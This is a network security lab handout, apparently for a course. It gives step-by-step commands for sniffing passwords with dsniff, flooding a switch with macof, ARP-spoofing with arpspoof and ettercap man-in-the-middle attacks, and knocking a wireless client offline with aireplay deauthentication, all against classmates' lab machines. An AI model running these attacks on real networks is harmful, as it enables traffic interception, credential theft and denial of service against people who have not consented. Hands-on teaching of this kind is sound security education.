Network Attacks Lab
-------------------------------------------------------------------------------------------------------
Many of these attacks will work on both WIRED and WIRELESS targets.
You can use any of:
1) Ubuntu Desktop WIRED, or
2) Boot BackTrack Desktop WIRED, or
3) Boot BackTrack on your Notebook WIRELESS
The three tools we will try are:
dsniff tools, ettercap, and aircrack
-------------------------------------------------------------------------------------------------------
DSNIFF
1 -- % dsniff
Let's run %dsniff, and see if we sniff any passwords
or password hashes during this lab.
a) open a Terminal window in your secondary Workspace
b) in that Terminal just type:
dsniff
Just leave it running in that window.
We'll come back and look at this window at the end of the lab
2 -- % macof
("macof" stands for "MAC OverFlow...").
Let's flood the lookup table of the switch and see if we start
to see more traffic. First we want to launch a traffic analysis
tool, such as %iptraf, to see what the normal traffic rate is.
a) run iptraf, select monitor mode for your main interface
iptraf
b) leave that running in a window
c) open another window and run
macof
d) did you start seeing a lot more TCP connections
in the iptraf window? __________________________________
3 -- % arpspoof
a) Pick 2 machines in your group for this exercise.
Machine #1 is the VICTIM
Write Down the IP Address of Machine #1 ___________________
Visit the Website http://www.cnn.com/
Look at your ARP Cache. ( arp -a, or ip neigh show )
What is the MAC Address of the Gateway? ___________________
b) Machine #2 is the Attacker
-- Install/Start APACHE on Machine #2
-- Change the Default Webpage on Machine #2 to Say: "Owned by Group #<Your Group>"
This is probably in the directory /var/www/html/index.html
-- Check your webpage with a browser so you know it is working.
c) figure out what the IP Address of the Default Gateway
is on your network. Example: netstat -r -n
Default route should start with 0.0.0.0 then the Gateway IP address
d) Attack Machine #1 from Machine #2
arpspoof -t <VICTIM-IP-ADDRESS> <GW-IP-ADDRESS>
e) now have the VICTIM connect to http://www.cnn.com/
Did they see your webpage? _____________________________
f) Have the VICTIM look at the ARP Cache.
What is the MAC Address of the Gateway?____________________
If this attack does not work, try it one more time.
-------------------------------------------------------------------------------------------------------
ETTERCAP
1 -- % ettercap MITM #1
Let's see if we can run a Man-In-The-Middle Attack.
For this exercise, we need three machines: 2 Victims
and 1 Attacker. Write down the IP Addresses:
a) IP of VICTIM #1 _________________________________________
b) IP of VICTIM #2 _________________________________________
c) IP of ATTACKER ________________________________________
Run A Sniffer On the ATTACKER Machine to Watch For Traffic
ex. tshark -n -i eth0
or
wireshark
d) try the attack
ettercap -T -M arp /victim1/ /victim2/
e) now have VICTIM1 send traffic to VICTIM2,
for example, on VICTIM1 say:
telnet <IP-OF-VICTIM2>
f) Did you see the traffic on the ATTACKER machine?________________
2 -- % ettercap MITM #2
Keep your traffic sniffer running on the attack machine.
Let's try another attack with ettercap.
a) IP of VICTIM_________________________________
b) IP of GATEWAY______________________________
ettercap -T -M arp:remote /VICTIM-IP/ /GATEWAY-IP/
c) Try some Remote Traffic on the VICTIM, ex. http://www.cnn.com/
d) Do you see the traffic on the ATTACKER machine?____________________
e) Add the plugin option
ettercap -T -P repoison_arp -M arp:remote /VICTIM-IP/ /GATEWAY-IP/
Try it again.
-------------------------------------------------------------------------------------------------------
AIRCRACK
Let's try and knock someone off of their AP connection.
We'll send management frames to disassociate them from their AP.
a) select a wireless VICTIM
b) what is the wireless MAC Address of VICTIM ____________________
c) what is the wireless MAC Address of the AP_____________________
(Just have the victim look at %iwconfig output)
d) Launch the attack:
aireplay -0 1 -a AP-MAC -c VICTIM-MAC [interface]
NOTE: the MAC notation is: 00:11:22:33:44:55
e) did the VICTIM lose connection during the attack???_________________
--- END